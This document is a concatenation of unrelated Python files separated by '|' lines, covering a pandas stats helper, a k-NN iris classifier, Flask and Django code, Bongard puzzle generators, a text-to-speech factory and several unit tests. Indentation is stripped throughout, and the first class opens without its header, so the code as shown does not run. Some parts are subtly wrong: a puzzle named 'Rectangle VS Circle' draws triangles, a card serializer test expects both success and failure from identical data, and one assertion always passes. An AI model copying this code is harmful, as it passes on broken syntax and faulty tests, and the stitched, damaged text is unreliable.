name_plural = "PriceShapes"
columns = ['action', 'csvfile', 'dblfile', 'hour', 'interval', 'like', 'mean', 'minterval', 'npts', 'price',
'sinterval', 'sngfile', 'stddev']
def __init__(self):
self.__action = None
self.__csvfile = None
self.__dblfile = None
self.__hour = None
self.__interval = None
self.__mean = None
self.__minterval = None
self.__npts = None
self.__price = None
self.__sinterval = None
self.__sngfile = None
self.__stddev = None
@property
def action(self):
return self.__action
@action.setter
def action(self, value):
self.__action = value
@property
def csvfile(self):
return self.__csvfile
@csvfile.setter
def csvfile(self, value):
self.__csvfile = value
@property
def dblfile(self):
return self.__dblfile
@dblfile.setter
def dblfile(self, value):
self.__dblfile = value
@property
def hour(self):
return self.__hour
@hour.setter
def hour(self, value):
self.__hour = value
@property
def interval(self):
return self.__interval
@interval.setter
def interval(self, value):
self.__interval = value
@property
def mean(self):
return self.__mean
@mean.setter
def mean(self, value):
self.__mean = value
@property
def minterval(self):
return self.__minterval
@minterval.setter
def minterval(self, value):
self.__minterval = value
@property
def npts(self):
return self.__npts
@npts.setter
def npts(self, value):
self.__npts = value
@property
def price(self):
return self.__price
@price.setter
def price(self, value):
self.__price = value
@property
def sinterval(self):
return self.__sinterval
@sinterval.setter
def sinterval(self, value):
self.__sinterval = value
@property
def sngfile(self):
return self.__sngfile
@sngfile.setter
def sngfile(self, value):
self.__sngfile = value
@property
def stddev(self):
return self.__stddev
@stddev.setter
def stddev(self, value):
self.__stddev = value
|
import numpy as np
import pandas as pd
def numerical_summary(series: pd.Series) -> dict:
"""
Args:
series: series to summarize
Returns:
"""
aggregates = [
"mean",
"std",
"var",
"max",
"min",
"median",
"kurt",
"skew",
"sum",
"mad",
]
summary = series.agg(aggregates).to_dict()
quantiles = [0.05, 0.25, 0.5, 0.75, 0.95]
for percentile, value in series.quantile(quantiles).to_dict().items():
summary["quantile_{:d}".format(int(percentile * 100))] = value
summary["iqr"] = summary["quantile_75"] - summary["quantile_25"]
summary["range"] = summary["max"] - summary["min"]
summary["cv"] = summary["std"] / summary["mean"] if summary["mean"] else np.NaN
# TODO: only calculations for histogram, not the plotting
# summary['image'] = plotting.histogram(series)
return summary
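# Minimal usage sketch (illustrative data, not part of the original module):
if __name__ == "__main__":
    example = pd.Series([1.0, 2.0, 3.0, 4.0, 100.0])
    stats = numerical_summary(example)
    print(stats["mean"], stats["quantile_50"], stats["iqr"], stats["range"])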
|
import unittest
from pylgrum.card import Card, Rank, Suit
from pylgrum.hand import Hand
from pylgrum.errors import OverdealtHandError
class TestHand(unittest.TestCase):
def test_too_many_cards(self):
"""Implicitly tests the add() override in Hand, too."""
h = Hand()
self.assertEqual(h.size(), 0)
h.add(Card(rank=Rank.QUEEN, suit=Suit.HEART)) # 0 : QH
h.add(Card(rank=Rank.JACK, suit=Suit.DIAMOND)) # 1 : JD
h.add(Card(rank=Rank.ACE, suit=Suit.CLUB)) # 2 : AC
h.add(Card(rank=Rank.KING, suit=Suit.SPADE)) # 3 : KS
h.add(Card(rank=Rank.TWO, suit=Suit.HEART)) # 4 : 2H
h.add(Card(rank=Rank.THREE, suit=Suit.DIAMOND)) # 5 : 3D
h.add(Card(rank=Rank.FOUR, suit=Suit.CLUB)) # 6 : 4C
h.add(Card(rank=Rank.FIVE, suit=Suit.SPADE)) # 7 : 5S
h.add(Card(rank=Rank.TEN, suit=Suit.HEART)) # 8 : 10H
h.add(Card(rank=Rank.NINE, suit=Suit.DIAMOND)) # 9 : 9D
h.add(Card(rank=Rank.EIGHT, suit=Suit.CLUB)) # 10: 8C
self.assertEqual(h.size(), 11) ## a full hand
with self.assertRaises(OverdealtHandError):
h.add(Card(rank=Rank.SEVEN, suit=Suit.SPADE))
if __name__ == '__main__':
unittest.main()
|
import argparse
import collections
import csv
import logging
import math
import pathlib
import random
from typing import Dict, List, NamedTuple, Optional, Sequence, Tuple, TypeVar
import requests
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
Vector = List[float]
def subtract(v: Vector, w: Vector) -> Vector:
if len(v) != len(w):
raise ValueError("Cannot subtract vectors of unequal length.")
return [
v_i - w_i
for v_i, w_i
in zip(v, w)
]
def dot(v: Vector, w: Vector) -> float:
"""Computes v_1 * w_1 + ... + v_n * w_n"""
assert len(v) == len(w), "Vectors must be the same length"
return sum(v_i * w_i for v_i, w_i in zip(v, w))
def magnitude(v: Vector) -> float:
return math.sqrt(dot(v, v))
def distance(v: Vector, w: Vector) -> float:
"""Computes the distance between v and w"""
return magnitude(subtract(v, w))
def raw_majority_vote(labels: List[str]) -> str:
votes = collections.Counter(labels)
winner, _ = votes.most_common(1)[0]
return winner
assert raw_majority_vote(["a", "b", "c", "b"]) == "b"
X = TypeVar("X") # Generic type to represent a data point.
def split_data(data: List[X], prob: float) -> Tuple[List[X], List[X]]:
"""Split data into fractions [prob, 1-prob]"""
data = data[:]
random.shuffle(data)
cut = int(len(data) * prob) # Use prob to find a cutoff
return data[:cut], data[cut:] # and split the shuffled list there.
def majority_vote(labels: List[str]) -> str:
"""Assumes that labels are ordered from nearest to farthest."""
vote_counts = collections.Counter(labels)
winner, winner_count = vote_counts.most_common(1)[0]
num_winners = len([
count
for count in vote_counts.values()
if count == winner_count
])
if num_winners == 1:
return winner
else:
return majority_vote(labels[:-1]) # Try again without the farthest
class LabeledPoint(NamedTuple):
point: Vector
label: str
def knn_classify(
k: int,
labeled_points: List[LabeledPoint],
new_point: Vector
) -> str:
# Order the labeled points from nearest to farthest.
by_distance = sorted(
labeled_points,
key=lambda lp: distance(lp.point, new_point)
)
# Find the labels for the k closest.
k_nearest_labels = [lp.label for lp in by_distance[:k]]
# And let them vote.
return majority_vote(k_nearest_labels)
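# Tiny illustrative check (hypothetical points): with k=1 the label of the single
# nearest neighbour wins.
assert knn_classify(
    1,
    [LabeledPoint([0.0, 0.0], "a"), LabeledPoint([10.0, 10.0], "b")],
    [0.1, 0.1],
) == "a"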
def parse_iris_row(row: List[str]) -> LabeledPoint:
"""
sepal_length, sepal_width, petal_length, petal_width, class
"""
measurements = [float(value) for value in row[:-1]]
# class is e.g. "Iris-virginica"; we just want "virginica"
try:
label = row[-1].split("-")[-1]
except:
breakpoint()
return LabeledPoint(measurements, label)
def main(argv: Optional[Sequence[str]] = None) -> int:
parser = argparse.ArgumentParser()
parser.add_argument("--dataset-path", required=True, type=str)
args = parser.parse_args(argv)
dataset_path = pathlib.Path(args.dataset_path)
if not dataset_path.is_absolute():
logging.error(f"'--dataset-path' must be absolute. {dataset_path=}.")
return 1
if dataset_path.exists():
logging.info(f"Using existing dataset at {dataset_path=}.")
else:
logging.info(f"Downloading Iris dataset to {dataset_path=}")
data = requests.get(
url="https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data",
)
with open(dataset_path, "w") as f:
f.write(data.text)
with open(dataset_path, "r") as f:
reader = csv.reader(f)
iris_data = [parse_iris_row(row) for row in reader if row]
# We'll also group just the points by species/label so we can plot them.
points_by_species: Dict[str, List[Vector]] = collections.defaultdict(list)
for iris in iris_data:
points_by_species[iris.label].append(iris.point)
# TODO(Jonathon): I'll skip plotting for now.
random.seed(12)
iris_train, iris_test = split_data(iris_data, 0.70)
iris_dataset_size = 150
assert len(iris_train) == 0.7 * iris_dataset_size
assert len(iris_test) == 0.3 * iris_dataset_size
# track how many times we see (predicted, actual)
confusion_matrix: Dict[Tuple[str, str], int] = collections.defaultdict(int)
num_correct = 0
for iris in iris_test:
predicted = knn_classify(5, iris_train, iris.point)
actual = iris.label
if predicted == actual:
num_correct += 1
confusion_matrix[(predicted, actual)] += 1
pct_correct = num_correct / len(iris_test)
logging.info(f"{pct_correct=}. {confusion_matrix=}")
return 0
if __name__ == "__main__":
raise SystemExit(main())
|
"""Utility functions only called by tests """
#%%
from natural_bm import dbm
from natural_bm import regularizers
#%%
def nnet_for_testing(nnet_type, W_reg_type=None, b_reg_type=None):
"""
This makes some small neural networks that are useful for testing.
# Arguments
nnet_type: Str; neural network identifier.
W_reg_type: Str or Regularizer; weight regularization.
b_reg_type: Str or Regularizer; bias regularization.
"""
if nnet_type == 'rbm':
layer_size_list = [10, 9]
topology_dict = {0: {1}}
elif nnet_type == 'dbm':
layer_size_list = [10, 9, 8]
topology_dict = {0: {1}, 1: {2}}
elif nnet_type == 'dbm_complex':
layer_size_list = [10, 9, 8, 7]
topology_dict = {0: {1, 3}, 1: {2}, 2: {3}}
else:
raise ValueError('Cannot recognize nnet_type input: {}'.format(nnet_type))
if W_reg_type is None:
W_regularizer = None
else:
W_regularizer = regularizers.get(W_reg_type)
if b_reg_type is None:
b_regularizer = None
else:
b_regularizer = regularizers.get(b_reg_type)
nnet = dbm.DBM(layer_size_list, topology_dict,
W_regularizer=W_regularizer, b_regularizer=b_regularizer)
return nnet
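# Minimal usage sketch: build the smallest and the most connected test networks,
# with no regularization (only identifiers defined above are used).
if __name__ == "__main__":
    rbm = nnet_for_testing('rbm')
    deep_net = nnet_for_testing('dbm_complex')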
|
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/')
def index():
return 'Здесь всё Ок! Но график синуса <a href="/sin/">дальше</a>.', 200
@app.route('/sin/')
def graph_sin():
return render_template('sin.html')
@app.errorhandler(404)
def page_not_found(error):
return 'Вы потерялись:( Но я вам <a href="/">помогу</a>!', 404
if __name__ == '__main__':
app.run()
|
"""Events keep an audit trail of all changes submitted to the datastore
"""
from sqlalchemy import and_, func
from . import db
from namex.exceptions import BusinessException
from marshmallow import Schema, fields, post_load
from datetime import datetime
from sqlalchemy.orm import backref
from sqlalchemy import cast, Date
from sqlalchemy.dialects.postgresql import JSONB
from datetime import datetime, timedelta
from ..constants import EventAction, EventUserId, EventState, RequestState, RequestPriority
class Event(db.Model):
__tablename__ = 'events'
id = db.Column(db.Integer, primary_key=True)
eventDate = db.Column('event_dt', db.DateTime(timezone=True), default=datetime.utcnow)
action = db.Column(db.String(1000))
jsonZip = db.Column('json_zip', db.Text)
eventJson = db.Column('event_json', JSONB)
# relationships
stateCd = db.Column('state_cd', db.String(20), db.ForeignKey('states.cd'))
state = db.relationship('State', backref=backref('state_events', uselist=False), foreign_keys=[stateCd])
nrId = db.Column('nr_id', db.Integer, db.ForeignKey('requests.id'))
userId = db.Column('user_id', db.Integer, db.ForeignKey('users.id'))
user = db.relationship('User', backref=backref('user_events', uselist=False), foreign_keys=[userId])
GET = 'get'
PUT = 'put'
PATCH = 'patch'
POST = 'post'
DELETE = 'DELETE'
UPDATE_FROM_NRO = 'update_from_nro'
NRO_UPDATE = 'nro_update'
MARKED_ON_HOLD = 'marked_on_hold'
SET_TO_DRAFT = 'set_to_draft'
NAMEX_PAY = 'namex_pay'
VALID_ACTIONS = [GET, PUT, PATCH, POST, DELETE]
def json(self):
return {"id": self.id, "eventDate": self.eventDate, "action": self.action, "stateCd": self.stateCd,
"jsonData": self.eventJson,
"requestId": self.nrId, "userId": self.userId}
def save_to_db(self):
db.session.add(self)
db.session.commit()
def save_to_session(self):
db.session.add(self)
def delete_from_db(self):
raise BusinessException()
@classmethod
def get_approved_names_counter(cls):
auto_approved_names_counter = db.session.query(
func.count(Event.id).label('approvedNamesCounter'))\
.filter(Event.action == Event.PATCH + 'Payment Completed')\
.filter(Event.userId == EventUserId.SERVICE_ACCOUNT.value)\
.filter(Event.stateCd.in_(('APPROVED','CONDITIONAL')))\
.filter(func.date_trunc('day', Event.eventDate) == func.date_trunc('day', func.now()))\
.all()
return auto_approved_names_counter.pop()
|
import pandas as pd
data = pd.read_csv("data/2016.csv")
df = pd.DataFrame(data)
# Strip the stray characters "M", "æ", "(", "=" and ")" from every cell.
df = df.replace('[Mæ(=)]', '', regex=True)
print(df)
df.to_csv("data/2022.csv", index=False)
|
import pandas as pd
df = pd.read_csv('all_me.csv')
df = df['Message']
all_text = []
# Skip raw API/service payloads and NaN rows; keep only plain text messages.
banned_tokens = ('"channel_id":', '"user_id":', '"users":', '"chat_id":', '"photo":')
for msg in df:
    msg = str(msg)
    if msg != 'nan' and not any(token in msg for token in banned_tokens):
        print(msg)
        all_text.append(msg)
with open('msgs.txt', 'w') as f:
f.write("""
——————————————
""".join(all_text))
|
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# This work is licensed under the MIT License.
# To view a copy of this license, visit https://opensource.org/licenses/MIT
from bongard import LineAction, ArcAction, OneStrokeShape, BongardImage, BongardProblem, BongardImagePainter, \
BongardProblemPainter
from bongard.plot import create_visualized_bongard_problem
import numpy as np
import os
def create_triangle(start_coordinates, start_orientation):
triangle_actions = []
l = np.random.uniform(low=0.1, high=0.15)
# line_length is in [0, 1]
action_0 = LineAction(line_length=l, line_type="normal", turn_direction="R", turn_angle=120)
action_1 = LineAction(line_length=l, line_type="normal", turn_direction="R", turn_angle=120)
action_2 = LineAction(line_length=l, line_type="normal", turn_direction="R", turn_angle=120)
triangle_actions = [action_0, action_1, action_2]
scaling_factors = [np.random.uniform(280, 300) for _ in range(len(triangle_actions))]
shape = OneStrokeShape(basic_actions=triangle_actions, start_coordinates=start_coordinates,
start_orientation=start_orientation, scaling_factors=scaling_factors)
return shape
def create_circle(start_coordinates, start_orientation):
# arc_angle is in [-360, 360]
arc_radius = np.random.uniform(low=0.05, high=0.075)
action_0 = ArcAction(arc_angle=360, arc_type="normal", turn_direction="R",
turn_angle=0, arc_radius=arc_radius)
circle_actions = [action_0]
scaling_factors = [np.random.uniform(240, 250) for _ in range(len(circle_actions))]
shape = OneStrokeShape(basic_actions=circle_actions, start_coordinates=start_coordinates,
start_orientation=start_orientation, scaling_factors=scaling_factors)
return shape
def create_random_positive_image():
# In the positive images, all the triangles are horizontally aligned.
shapes = []
num_triangles = np.random.randint(4, 5)
num_circles = np.random.randint(6, 7)
x_mean = np.random.uniform(-300, 300)
triangle_ys = [-300 + 600 / num_triangles * i + np.random.uniform(-5, 5) for i in range(num_triangles)]
triangle_xs = [x_mean + np.random.uniform(-5, 5) for _ in range(num_triangles)]
def sample_circle_x(triangle_x_mean):
if np.random.uniform(-300, 300) < x_mean:
x = np.random.uniform(-300, triangle_x_mean - 50)
else:
x = np.random.uniform(triangle_x_mean + 50, 300)
return x
circle_xs = [sample_circle_x(triangle_x_mean=x_mean) for _ in range(num_circles)]
for i in range(num_triangles):
triangle = create_triangle(start_coordinates=(triangle_ys[i], triangle_xs[i]), start_orientation=120)
shapes.append(triangle)
for i in range(num_circles):
circle = create_circle(start_coordinates=(np.random.uniform(-300, 300), circle_xs[i]),
start_orientation=np.random.uniform(-360, 360))
shapes.append(circle)
bongard_image = BongardImage(one_stroke_shapes=shapes)
return bongard_image
def create_random_negative_image():
# In the negative images, all the triangles are vertically aligned.
shapes = []
num_triangles = np.random.randint(4, 5)
num_circles = np.random.randint(6, 7)
y_mean = np.random.uniform(-300, 300)
triangle_xs = [-300 + 600 / num_triangles * i + np.random.uniform(-5, 5) for i in range(num_triangles)]
triangle_ys = [y_mean + np.random.uniform(-5, 5) for _ in range(num_triangles)]
def sample_circle_y(triangle_y_mean):
if np.random.uniform(-300, 300) < y_mean:
y = np.random.uniform(-300, triangle_y_mean - 50)
else:
y = np.random.uniform(triangle_y_mean + 50, 300)
return y
circle_ys = [sample_circle_y(triangle_y_mean=y_mean) for _ in range(num_circles)]
for i in range(num_triangles):
triangle = create_triangle(start_coordinates=(triangle_ys[i], triangle_xs[i]), start_orientation=120)
shapes.append(triangle)
for i in range(num_circles):
circle = create_circle(start_coordinates=(circle_ys[i], np.random.uniform(-300, 300)),
start_orientation=np.random.uniform(-360, 360))
shapes.append(circle)
bongard_image = BongardImage(one_stroke_shapes=shapes)
return bongard_image
def create_bongard_problem():
bongard_problem_name = "Rectangle VS Circle"
# A Bongard problem typically consists of seven images each for the positive and negative sides.
# The first six images would be used for "training", and the last image would be reserved for "test"
bongard_problem_positive_images = [create_random_positive_image() for _ in range(7)]
bongard_problem_negative_images = [create_random_negative_image() for _ in range(7)]
bongard_problem = BongardProblem(positive_bongard_images=bongard_problem_positive_images,
negative_bongard_images=bongard_problem_negative_images,
problem_name=bongard_problem_name, positive_rules=None,
negative_rules=None)
return bongard_problem
if __name__ == "__main__":
random_seed = 0
bongard_problem_ps_dir = "./demo/ps"
bongard_problem_png_dir = "./demo/png"
bongard_problem_vis_filepath = "./demo/bongard_demo.png"
if not os.path.exists(bongard_problem_ps_dir):
os.makedirs(bongard_problem_ps_dir)
if not os.path.exists(bongard_problem_png_dir):
os.makedirs(bongard_problem_png_dir)
np.random.seed(random_seed)
# Create an instance of Bongard problem based our design.
bongard_problem = create_bongard_problem()
# Use Bongard problem painter to draw Bongard problems.
# The Bongard problem painter supports creating Bongard problems whose image has at most two shapes.
bongard_problem_painter = BongardProblemPainter(random_seed=random_seed)
# The Bongard painter will automatically create Bongard problems in the specified directories.
# The Bongard images created will be saved to disk.
bongard_problem_painter.create_bongard_problem(bongard_problem=bongard_problem,
bongard_problem_ps_dir=bongard_problem_ps_dir,
bongard_problem_png_dir=bongard_problem_png_dir,
auto_position=False)
# Create a merged image for Bongard problem human-readable visualization, using the helper function.
create_visualized_bongard_problem(bongard_problem_dir=bongard_problem_png_dir,
bongard_problem_visualized_filepath=bongard_problem_vis_filepath)
|
class TTSFactory:
from text2speech.modules.espeak_tts import ESpeak
from text2speech.modules.espeakng_tts import ESpeakNG
from text2speech.modules.google_tts import GoogleTTS
from text2speech.modules.mary_tts import MaryTTS
from text2speech.modules.mimic_tts import Mimic
from text2speech.modules.spdsay_tts import SpdSay
from text2speech.modules.ibm_tts import WatsonTTS
from text2speech.modules.responsive_voice_tts import ResponsiveVoiceTTS
from text2speech.modules.mimic2_tts import Mimic2
from text2speech.modules.pico_tts import PicoTTS
from text2speech.modules.polly_tts import PollyTTS
from text2speech.modules.festival_tts import FestivalTTS
from text2speech.modules.voice_rss import VoiceRSSTTS
from text2speech.modules.mbrola_tts import MbrolaTTS
from text2speech.modules.mozilla_tts import MozillaTTSServer
CLASSES = {
"mimic": Mimic,
"mimic2": Mimic2,
"google": GoogleTTS,
"marytts": MaryTTS,
"espeak": ESpeak,
"espeak-ng": ESpeakNG,
"spdsay": SpdSay,
"watson": WatsonTTS,
"responsive_voice": ResponsiveVoiceTTS,
"polly": PollyTTS,
"pico": PicoTTS,
"festival": FestivalTTS,
"mbrola": MbrolaTTS,
"voicerss": VoiceRSSTTS,
"mozilla_server": MozillaTTSServer
}
@staticmethod
def create(tts_config=None):
"""
Factory method to create a TTS engine based on configuration.
The configuration file ``chatterbox.conf`` contains a ``tts`` section with
the name of a TTS module to be read by this method.
"tts": {
"module": <engine_name>
}
"""
tts_config = tts_config or {}
tts_module = tts_config.get("module", "google")
tts_config = tts_config.get(tts_module, {}) or\
tts_config.get('tts', {}).get(tts_module, {})
clazz = TTSFactory.CLASSES.get(tts_module)
tts = clazz(tts_config)
tts.validator.validate()
return tts
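# Hedged usage sketch: "google" is also the factory's fallback when no module is
# configured; any other key from TTSFactory.CLASSES could be passed instead.
if __name__ == "__main__":
    engine = TTSFactory.create({"module": "google"})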
|
"""
Base finders
"""
import functools
from collections import namedtuple
from pathlib import Path
from demosys.conf import settings
from demosys.exceptions import ImproperlyConfigured
from demosys.utils.module_loading import import_string
FinderEntry = namedtuple('FinderEntry', ['path', 'abspath', 'exists'])
class BaseFileSystemFinder:
"""Base class for searching directory lists"""
settings_attr = None
def __init__(self):
if not hasattr(settings, self.settings_attr):
raise ImproperlyConfigured(
"Settings module don't define {}."
"This is required when using a FileSystemFinder.".format(self.settings_attr)
)
self.paths = getattr(settings, self.settings_attr)
def find(self, path: Path):
"""
Find a file in the path. The file may exist in multiple
paths. The last found file will be returned.
:param path: The path to find
:return: The absolute path to the file or None if not found
"""
# Update paths from settings to make them editable runtime
# This is only possible for FileSystemFinders
if getattr(self, 'settings_attr', None):
self.paths = getattr(settings, self.settings_attr)
path_found = None
for entry in self.paths:
abspath = entry / path
if abspath.exists():
path_found = abspath
return path_found
class BaseEffectDirectoriesFinder(BaseFileSystemFinder):
"""Base class for searching effect directories"""
directory = None
def __init__(self):
pass
def find(self, path: Path):
path = Path(self.directory) / Path(path)
return super().find(path)
@property
def paths(self):
from demosys.effects.registry import effects
return list(effects.get_dirs())
@functools.lru_cache(maxsize=None)
def get_finder(import_path):
"""
Get a finder class from an import path.
Raises ``demosys.core.exceptions.ImproperlyConfigured`` if the finder is not found.
This function uses an lru cache.
:param import_path: string representing an import path
:return: An instance of the finder
"""
Finder = import_string(import_path)
if not issubclass(Finder, BaseFileSystemFinder):
raise ImproperlyConfigured('Finder {} is not a subclass of core.finders.FileSystemFinder'.format(import_path))
return Finder()
|
from dependency_injection.decorators.autowired import autowired
from dependency_injection.decorators.autowired_enums import AutoWiredType
from dependency_injection.test_dependency_injection.injected_class1 import InjectedClass
from dependency_injection.test_dependency_injection.injected_class2 import InjectedClass2
class TestClassSinglecall:
@autowired(AutoWiredType.SINGLECALL)
def __init__(self, my_name: str, no_name: str, injected_class1: InjectedClass, injected_class2: InjectedClass2):
self.injected_class1 = injected_class1
self.my_name = my_name
def boo(self) -> str:
return self.injected_class1.foo('hello TestClassSinglecall')
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from ppdet.core.workspace import register, create
from .meta_arch import BaseArch
__all__ = ['SSD']
@register
class SSD(BaseArch):
"""
Single Shot MultiBox Detector, see https://arxiv.org/abs/1512.02325
Args:
backbone (nn.Layer): backbone instance
ssd_head (nn.Layer): `SSDHead` instance
post_process (object): `BBoxPostProcess` instance
"""
__category__ = 'architecture'
__inject__ = ['post_process']
def __init__(self, backbone, ssd_head, post_process):
super(SSD, self).__init__()
self.backbone = backbone
self.ssd_head = ssd_head
self.post_process = post_process
@classmethod
def from_config(cls, cfg, *args, **kwargs):
# backbone
backbone = create(cfg['backbone'])
# head
kwargs = {'input_shape': backbone.out_shape}
ssd_head = create(cfg['ssd_head'], **kwargs)
return {
'backbone': backbone,
"ssd_head": ssd_head,
}
def _forward(self):
# Backbone
body_feats = self.backbone(self.inputs)
# SSD Head
if self.training:
return self.ssd_head(body_feats, self.inputs['image'],
self.inputs['gt_bbox'],
self.inputs['gt_class'])
else:
preds, anchors = self.ssd_head(body_feats, self.inputs['image'])
bbox, bbox_num = self.post_process(preds, anchors,
self.inputs['im_shape'],
self.inputs['scale_factor'])
return bbox, bbox_num
def get_loss(self, ):
return {"loss": self._forward()}
def get_pred(self):
bbox_pred, bbox_num = self._forward()
output = {
"bbox": bbox_pred,
"bbox_num": bbox_num,
}
return output
|
import sys
BANNER_TEXT = "---------------- Starting Your Algo --------------------"
def get_command():
"""Gets input from stdin
"""
try:
ret = sys.stdin.readline()
except EOFError:
# Game parent process terminated so exit
debug_write("Got EOF, parent game process must have died, exiting for cleanup")
exit()
if ret == "":
# Happens if parent game process dies, so exit for cleanup,
# Don't change or starter-algo process won't exit even though the game has closed
debug_write("Got EOF, parent game process must have died, exiting for cleanup")
exit()
return ret
def send_command(cmd):
"""Sends your turn to standard output.
Should usually only be called by 'GameState.submit_turn()'
"""
sys.stdout.write(cmd.strip() + "\n")
sys.stdout.flush()
def debug_write(*msg):
"""Prints a message to the games debug output
Args:
* msg: The message to output
"""
# Printing to STDERR is okay; the game prints it out, but it doesn't affect turns.
sys.stderr.write(", ".join(map(str, msg)).strip() + "\n")
sys.stderr.flush()
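# Minimal illustration of the I/O helpers above (the payload string is an arbitrary
# placeholder, not a real turn format):
if __name__ == "__main__":
    debug_write(BANNER_TEXT)
    send_command("example turn payload")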
|
#!/usr/bin/env python3
"""
Created on 14 Jul 2021
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
"""
from scs_core.data.recurring_period import RecurringPeriod
from scs_core.data.datetime import LocalizedDatetime
# --------------------------------------------------------------------------------------------------------------------
now = LocalizedDatetime.now()
print("day...")
period = RecurringPeriod.construct(1, 'D')
print(period)
print(' cron: %s' % period.cron(2))
print('aws_cron: %s' % period.aws_cron(2))
print("-")
print("hours...")
period = RecurringPeriod.construct(4, 'H')
print(period)
print(' cron: %s' % period.cron(2))
print('aws_cron: %s' % period.aws_cron(2))
print("-")
print("minutes...")
period = RecurringPeriod.construct(5, 'M')
print(period)
print(' cron: %s' % period.cron(2))
print('aws_cron: %s' % period.aws_cron(2))
|
import os
from django.conf import settings
from django.test import TestCase
from django.urls import reverse
from django.core.files.uploadedfile import SimpleUploadedFile
# from mixer.backend.django import mixer
from rest_framework.test import APITestCase, APIClient
from board.serializers import BoardSerializer, ListSerializer, CardSerializer
from board.models import Board, List, Card, Attachment
# from PIL import Image
from django.shortcuts import render, get_object_or_404
"""
BoardSerializer
CardSerializer:
serializer = CardSerializer(data={})
serializer.is_valid(): ==> True / False
serializer.save(): <=== Card instance from the db
ListSerializer:
AttachmentSerializer
"""
"""
TDD Approach:
------------
1. Write tests for the functionality you want to implement
2. Run the tests, see them fail
3. Write / implement code for the functionality
4. Run tests to make sure they're passing
"""
class BoardSerializerTest(TestCase):
def setUp(self):
self.board_data = {
"name": "Test Board Name",
"description": "Some board created during testing"
}
def test_is_valid(self):
serializer = BoardSerializer(data=self.board_data)
self.assertTrue(serializer.is_valid())
board = serializer.save()
db_board = Board.objects.first()
self.assertEqual(board, db_board)
for field, value in self.board_data.items():
self.assertEqual(value, getattr(db_board, field))
# test for the date field
self.assertTrue("date", hasattr(db_board, "date"))
self.assertIsNotNone(db_board.date)
def test_invalid(self):
# missing name field
del self.board_data["name"]
serializer = BoardSerializer(data=self.board_data)
self.assertFalse(serializer.is_valid())
class ListSerializerTest(TestCase):
def setUp(self):
# board_author = User.objects.create(username="tester")
board = Board.objects.create(
name="Test Name", description="Some testing board")
self.list_data = {
"title": "Some title of a list created during testing",
"board": board.pk
}
def test_is_valid(self):
serializer = ListSerializer(data=self.list_data)
self.assertTrue(serializer.is_valid())
list = serializer.save()
db_list = List.objects.first()
self.assertEqual(list, db_list)
self.assertEqual(db_list.title, self.list_data["title"])
self.assertEqual(db_list.board.pk, self.list_data["board"])
# test for the created_at field
self.assertTrue("created_at", hasattr(db_list, "created_at"))
self.assertIsNotNone(db_list.created_at)
def test_invalid(self):
del self.list_data["title"]
serializer = ListSerializer(data=self.list_data)
self.assertFalse(serializer.is_valid())
class CardSerializerTest(TestCase):
def setUp(self):
# create a list
self.card_data = {
"description": "Some board created during testing"
}
def test_is_valid(self):
serializer = CardSerializer(data=self.card_data)
self.assertTrue(serializer.is_valid())
card = serializer.save()
db_card = Card.objects.first()
self.assertEqual(card, db_card)
for field, value in self.card_data.items():
self.assertEqual(value, getattr(db_card, field))
# test for the date field
self.assertTrue(hasattr(db_card, "created_at"))
self.assertIsNotNone(db_card.created_at)
def test_invalid(self):
# missing name field
serializer = CardSerializer(data=self.card_data)
self.assertFalse(serializer.is_valid())
class BoardViewTest(APITestCase):
def setUp(self):
self.client = APIClient()
self.board_data = {
"name": "Test Board",
"description": "Some board description test"
}
# create(name="", description="")
self.DATETIME_FORMAT = settings.REST_FRAMEWORK['DATETIME_FORMAT']
self.board = Board.objects.create(**self.board_data)
def test_get_all_boards(self):
"""
Tests that all boards can be fetched on route: /api/boards/ -- LIST (GET)
"""
response = self.client.get(reverse("board:boards"))
self.assertTrue(response.json()["success"])
self.assertEqual(response.status_code, 200)
response_boards = response.json()["boards"]
# import pdb
# pdb.set_trace()
for board in response_boards:
db_board = Board.objects.get(name=board["name"])
for key, value in board.items():
if key == "date":
self.assertEqual(value, getattr(
db_board, key).strftime(self.DATETIME_FORMAT))
continue
self.assertEqual(value, getattr(db_board, key))
def test_create_board(self):
"""
Tests for route: /api/boards/ -- POST
"""
data = {
"name": "Board name",
"description": "Board description"
}
response = self.client.post(reverse("board:boards"), data=data)
self.assertEqual(response.status_code, 201)
self.assertTrue(response.json()["success"])
db_board = Board.objects.get(name=data["name"])
self.assertEqual(data["name"], db_board.name)
self.assertEqual(data["description"], db_board.description)
response_board = response.json()["board"]
self.assertEqual(data["name"], response_board["name"])
self.assertEqual(data["description"], response_board["description"])
def test_get_a_single_board(self):
"""
Tests that a single board can be fetched on route: /api/boards/<int:pk>/
"""
# Create a board [Done]
# hit the endpoint with the board's pk on /api/boards/<int:pk>/
# Assert the content
response = self.client.get(
reverse("board:board-detail", args=(self.board.pk,)))
self.assertEqual(response.status_code, 200)
for field, value in self.board_data.items():
self.assertEqual(value, getattr(self.board, field))
def test_update_a_single_board(self):
"""
Test that a single board can be updated on route: /api/boards/<int:pk>/
"""
update_data = {
"name": "James"
}
response = self.client.put(
reverse("board:board-detail", args=(self.board.pk,)), data=update_data)
self.assertEqual(response.status_code, 200)
self.board.refresh_from_db()
self.assertEqual(update_data['name'], self.board.name)
def test_delete_a_single_board(self):
"""
Test that a single board can be deleted on route: /api/boards/<int:pk>/
"""
response = self.client.delete(
reverse("board:board-detail", args=(self.board.pk,)))
self.assertEqual(response.status_code, 204)
with self.assertRaises(Board.DoesNotExist):
# Raise does not exist
Board.objects.get(name=self.board_data["name"])
class AttachmentViewTest(APITestCase):
def setUp(self):
self.client = APIClient()
attachment_path = os.path.join(
settings.BASE_DIR, "board", "tests", "resources", "FJ9zqiRWQAImHie.jpeg")
image = open(attachment_path, "rb")
file = SimpleUploadedFile(image.name, image.read())
self.attachment_data = {
"file": "FJ9zqiRWQAImHie.jpeg",
"type": 'image'
}
self.attachment = Attachment.objects.create(**self.attachment_data)
